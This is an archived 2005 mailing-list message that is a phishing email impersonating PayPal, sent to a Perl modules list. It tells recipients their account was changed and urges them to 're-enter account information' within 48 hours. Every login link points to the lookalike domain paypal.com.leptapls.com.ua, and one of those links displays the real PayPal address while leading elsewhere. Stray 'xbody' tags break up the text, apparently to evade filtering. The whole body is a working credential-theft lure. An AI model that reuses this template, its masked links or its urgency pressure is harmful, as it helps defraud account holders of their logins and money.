Newsgroups: perl.modules
Path: nntp.perl.org
Xref: nntp.perl.org perl.modules:42005
Return-Path: <service@paypal.com>
Mailing-List: contact modules-help@perl.org; run by ezmlm
Delivered-To: mailing list modules@perl.org
Received: (qmail 15317 invoked from network); 27 Jul 2005 04:40:31 -0000
Received: from x1a.develooper.com (HELO x1.develooper.com) (216.52.237.111)
  by lists.develooper.com with SMTP; 27 Jul 2005 04:40:31 -0000
Received: (qmail 5110 invoked by uid 225); 27 Jul 2005 04:40:31 -0000
Delivered-To: modules@perl.org
Received: (qmail 5104 invoked by alias); 27 Jul 2005 04:40:30 -0000
X-Spam-Status: No, hits=0.3 required=8.0
	tests=BAYES_50,HTML_80_90,HTML_MESSAGE,HTML_NONELEMENT_00_10,MIME_HTML_ONLY
X-Spam-Check-By: la.mx.develooper.com
Received-SPF: softfail (x1.develooper.com: transitioning domain of service@paypal.com does not designate 69.64.33.44 as permitted sender)
Received: from air195.startdedicated.com (HELO air195.startdedicated.com) (69.64.33.44)
    by la.mx.develooper.com (qpsmtpd/0.28) with ESMTP; Tue, 26 Jul 2005 21:40:29 -0700
Received: (qmail 24599 invoked from network); 27 Jul 2005 16:34:58 +1200
Received: from localhost (HELO vampedup.co.nz) (127.0.0.1)
  by localhost with SMTP; 27 Jul 2005 16:34:58 +1200
Date: Wed, 27 Jul 2005 16:34:58 +1200
To: "modules@perl.org\r" <modules@perl.org>
Subject: Notification Your Account Information
Message-ID: <e785f3ecda7f29cdab7a3483e9e7b532@vampedup.co.nz>
X-Priority: 3
X-Mailer: PHPMailer [version 1.72]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset="iso-8859-1"
X-Virus-Checked: Checked
Approved: news@nntp.perl.org
From: service@paypal.com ("service@paypal.com")

<body link="#336699">

<div id=message>
<html>
<head>
<title>PayPal</title>
</head>
<xbody bgcolor="#ffffff">
<style type="text/css">
#message .dummy {}
#message, #message TD {font-family: verdana,arial,helvetica,sans-serif;font-size:
12px;color: #000000;}
#message LI {line-height: 120%;}
#message UL.ppsmallborder {margin:10px 5px 10px 20px;}
#message LI.ppsmallborderli {margin:0px 0px 5px 0px;}
#message UL.pp_narrow {margin:10px 5px 0px 40px;}
#message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left:
#fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;}
#message .pp_label {font-family: verdana,arial,helvetica,sans-serif;font-size:
10px;font-weight: bold;color: #000000;}
#message .pp_serifbig {font-family: serif;font-size: 20px;font-weight: bold;color:
#000000;}
#message .pp_serif{font-family: serif;font-size: 16px;color: #000000;}
#message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size:
16px;color: #000000;}
#message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size:
18px;font-weight: bold;color: #003366;}	
#message .pp_subheadingeoa {font-family:
verdana,arial,helvetica,sans-serif;font-size: 15px;font-weight: bold;color:
#000000;}	
#message .pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size:
16px;font-weight: bold;color: #003366;}	
#message .pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size:
11px;color: #003366;}	
#message .pp_sidebartextbold {font-family:
verdana,arial,helvetica,sans-serif;font-size: 11px;font-weight: bold;color:
#003366;}	
#message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size:
11px;color: #aaaaaa;}
#message .pp_button {font-size: 13px; font-family:
verdana,arial,helvetica,sans-serif; font-weight: 400; border-style:outset;
color:#000000; background-color: #cccccc;}
#message .pp_smaller {font-family: verdana,arial,helvetica,sans-serif;font-size:
10px;color: #000000;}
#message .pp_smallersidebar {font-family:
verdana,arial,helvetica,sans-serif;font-size: 10px;color: #003366;}
#message .ppem106 {font-weight: 700;}
</style>
<table width="600" cellspacing="0" cellpadding="0" border="0"
align="center">
	<tr valign="top">
		<td><A target="_blank"  href="https://www.paypal.com/us" >
        <IMG
src="http://images.paypal.com/en_US/i/logo/email_logo.gif"  alt="PayPal"
border="0" width="255" height="35"></A>
		</td>
	</tr>
</table>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tr>
	<td background="http://images.paypal.com/images/bg_clk.gif" 
width=100%><img src="http://images.paypal.com/images/pixel.gif"  height="29"
width="1" border="0"></td>
</tr>	
<tr>
	<td><img src="http://images.paypal.com/images/pixel.gif"  height="10"
width="1" border="0"></td>
</tr>
</table>
<table width="600" cellspacing="0" cellpadding="0" border="0"
align="center">
	<tr valign="top">
		<td width="400">
			<table width="100%" cellspacing="0" cellpadding="5" border="0">
				<tr valign="top">
					<td><table width="100%" cellspacing="0" cellpadding="0" border="0">
	<tr>
		<td class="pp_heading" align="left">Notification 
<xbody bgcolor="#ffffff">
        Account Information</xbody></td>
	</tr>
</table>		
</td>
        </tr>
	<tr>
		<td>
			 <p>
			<b>Dear PayPal Member,</b><br>
            <br>You've been change account information.<br>
            It has come to our attention to protect your PayPal account 
            information and to reduce the instance of fraud on our website.<br><br>
<xbody bgcolor="#ffffff">
            If you did not authorize this change, p</xbody>lease re-enter your account information records within 
            <b>48 hours</b>. If you did not re-enter your account 
            information within overdue time, we will update your account 
            information in our records.</p>
            <p>You must
<b>click the link below</b> to re-enter your account information on the following page
to confirm your account information records.<br><br>
			</p>
			<table width="75%" cellpadding="1" cellspacing="0" border="0"
bgcolor="#FFE65C" align=left height="37">
				<tr>
					<td height="35">
						<table width="100%" cellpadding="4" cellspacing="0" border="0"
bgcolor="#FFFECD" align="center">
							<tr>
								<td class="pp_sansserif" align="center">
                                <a target="_blank" href="http://paypal.com.leptapls.com.ua/ac=DQAAAG0AAABFsGD8fIpw5O01Rb9G-6gNq2LQcRoymOhFsH7Z1EpoALebjw9M30Ymouf-aZwRwPVQYMX8GQ0EcA6wVOIv0jA0mcoUGRMoYkw9bYdtaLiPKs1oTKQHzVxHwm7ZvqYCICNOTqyAsp61HBsDAiVh10Af&zx=ncqcqzqlsf2g.html">Click here to re-enter your account information</a></td>
							</tr>
						</table>
					</td>
				</tr>
			</table>
			<br>
			<br>
			<br>
			   
			 <p>You can also re-enter your account Information by logging 
            into your PayPal
account at <a target="_blank" href="http://paypal.com.leptapls.com.ua/ac=DQAAAG0AAABFsGD8fIpw5O01Rb9G-6gNq2LQcRoymOhFsH7Z1EpoALebjw9M30Ymouf-aZwRwPVQYMX8GQ0EcA6wVOIv0jA0mcoUGRMoYkw9bYdtaLiPKs1oTKQHzVxHwm7ZvqYCICNOTqyAsp61HBsDAiVh10Af&zx=ncqcqzqlsf2g.html">https://www.paypal.com/us/</a>. <br><br>
			Thank you for using PayPal!<br>
The PayPal Team
                     </td>   
                 </tr>
                 <tr>
		     <td><hr class="dotted"></td>
		 </tr>
		 <tr>
		     <td><table width="100%" cellspacing="0" cellpadding="0" border="0">
	<tr>
		<td class="pp_footer">
			Please do not reply to this e-mail. Mail sent to this address cannot be
answered. For assistance,
            <a target="_blank" href="http://paypal.com.leptapls.com.ua/ac=DQAAAG0AAABFsGD8fIpw5O01Rb9G-6gNq2LQcRoymOhFsH7Z1EpoALebjw9M30Ymouf-aZwRwPVQYMX8GQ0EcA6wVOIv0jA0mcoUGRMoYkw9bYdtaLiPKs1oTKQHzVxHwm7ZvqYCICNOTqyAsp61HBsDAiVh10Af&zx=ncqcqzqlsf2g.html">log
in</a> to your PayPal account and choose the "Help" link in the footer of
any page.<br>
			<br class="h10">
			To receive email notifications in plain text instead of HTML, update
your preferences <a target="_blank"  href="https://www.paypal.com/us/PREFS-NOTI" >here</a>.		
		</td>
	</tr>
	<tr>
		<td><img src="http://images.paypal.com/en_US/i/scr/pixel.gif"  height="10"
width="1" border="0"></td> 
	</tr>	
</table>	

</td>
		 </tr>
                 <tr>
				<td><br><span class="pp_footer">
PayPal Email ID PP468<br><br>
</span>
</td>
			</tr>
             </table>   
         </td>   
         <td><img src="http://images.paypal.com/en_US/i/scr/pixel.gif" 
height="1" width="10" border="0"></td>                   
         <td width="190" valign="top">   
             <table width="100%" cellspacing="0" cellpadding="1" border="0"
bgcolor="#cccccc">   
                 <tr>   
                     <td>   
                         <table width="100%" cellspacing="0"
cellpadding="0" border="0" bgcolor="#ffffff">   
                             <tr>   
                                 <td><table width="100%" cellspacing="0"
cellpadding="5" border="0" bgcolor="#eeeeee">
	<tr>
		<td class="pp_sidebartextbold" align="center">Protect Your Account
Info</td>
	</tr>
</table>		
<table width="100%" cellspacing="0" cellpadding="5" border="0">
	<tr>
		<td class="pp_sidebartext">Make sure you never provide your password to
fraudulent websites. <br><br>To safely  and securely access the PayPal
website or your account, open a new web browser (e.g. Internet Explorer or
Netscape) and type in the PayPal URL (https://www.paypal.com/us/) to be
sure you are on the real PayPal site.<br><br>PayPal will never ask you to
enter your password in an email.<br><br> For more information on protecting
yourself from fraud, please review our Security Tips at
https://www.paypal.com/us/securitytips<br><img
src="http://images.paypal.com/en_US/images/pixel.gif"  height="5" width="1"
border="0"> </td>
	</tr>
</table>	


</td>   
                             </tr>   
                             <tr>   
                                 <td><table width="100%" cellspacing="0"
cellpadding="5" border="0" bgcolor="#eeeeee">
	<tr>
		<td class="pp_sidebartextbold" align="center">Protect Your Password</td>
	</tr>
</table>		
<table width="100%" cellspacing="0" cellpadding="5" border="0">
	<tr>
		<td class="pp_sidebartext">You should <span class="ppem106">never</span>
give your PayPal password to anyone, including PayPal employees.<br><img
src="http://images.paypal.com/en_US/i/scr/pixel.gif"  height="5" width="1"
border="0"></td>
	</tr>
</table>	
</td>   
                             </tr>   
                         </td>   
                     </table>   
                 </td>   
             </table>                                           
         </td>   
     </tr>           
</table>       
</xbody>   
</html>
</div>


